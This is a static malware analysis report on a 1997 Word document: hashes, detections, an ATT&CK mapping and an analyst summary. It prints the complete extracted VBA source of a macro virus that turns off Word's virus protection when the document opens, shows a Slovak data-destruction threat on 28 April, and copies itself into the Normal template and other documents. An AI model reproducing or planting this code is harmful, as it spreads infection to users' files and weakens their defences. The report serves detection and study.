Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f8c5f33f6df4a04d…

MALICIOUS

Office (OLE)

Size: 26.5 KB
Created: 1997-01-29 21:19:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 5926d4635a800106d75f6099eeee335b
SHA-1: adf0c97fa20c28f831340329007f8b18974cdb5c
SHA-256: f8c5f33f6df4a04d88fa96a6d36abab10bcc98c8482597674e7531bb11b76920
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for malicious documents. The macro attempts to disable virus protection by setting 'Options.VirusProtection = False'. It also displays a warning message to the user, which could be a social engineering tactic or a distraction. The macro attempts to copy itself to the Normal template and the active document, potentially for persistence or propagation.

Heuristics 3

  • ClamAV: Heuristics.Macro.DisableVirusProtection-6136181-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Heuristics.Macro.DisableVirusProtection-6136181-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1212 bytes
SHA-256: c5f8587311e179265736f2940ff75abb2211dcb7f48a0d811adafb69f3d93f28
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_Open()
Options.VirusProtection = False
If InStr(Date, "28.4.") <> 0 Then
MsgBox "Nazdar!" + Chr(10) + Chr(13) + _
"Ja som virus WORDO a ked sa mi bude chciet" _
+ ", tak znicim vsetky data v tomto " _
+ "pocitaci.", vbOKOnly + vbExclamation, _
"VIRUS"
End If
If NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines = 0 Then GoTo 1
If ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines <> 0 Then Exit Sub
pr = NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines - 1
z = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(1, pr)
ActiveDocument.VBProject.VBComponents(1).CodeModule.AddFromString (z)
ActiveDocument.Save
Exit Sub
1
pr = ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines - 1
z = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(1, pr)
NormalTemplate.VBProject.VBComponents(1).CodeModule.AddFromString (z)
NormalTemplate.Save
End Sub